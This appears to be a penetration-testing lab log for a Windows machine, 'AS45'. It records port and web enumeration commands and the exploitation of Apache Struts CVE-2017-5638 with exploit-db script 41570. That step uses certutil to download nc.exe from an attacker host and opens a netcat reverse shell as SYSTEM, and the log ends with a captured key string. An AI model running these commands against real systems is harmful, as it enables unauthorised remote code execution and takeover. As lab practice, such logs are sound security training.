AS45
๐งช Pentest Log: {{date:2025-08-29}}
๐ Target Information
- Machine Name: AS45
- IP Address: 10.11.1.109
- Operating System: Windows
ip=10.11.1.109
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 21
Port 8080
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
nikto -h http://$ip
Found
struts2-rest-showcase
Google "apache struts 2 exploit-db"
CVE-2017-5638
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 8080
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://www.exploit-db.com/exploits/41570
python2 41570.py http://$ip:8080/struts2-rest-showcase/ 'certutil -urlcache -split -f http://172.16.1.2:8080/nc.exe nc.exe'
nc -lnvp 8080
python2 41570.py http://$ip:8080/struts2-rest-showcase/ 'nc.exe 172.16.1.2 8080 -e cmd'
๐งฌ Privilege Escalation
๐ค Current Access
- User: nt authority\system
- Groups: N/A
- Shell Type: reverse shell
๐ Enumeration
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: N/A
- Target Binary/Service: N/A
- Reference / Source: N/A
๐ง Exploit Steps
- Key File
6f7rlecj04by2lvx28ao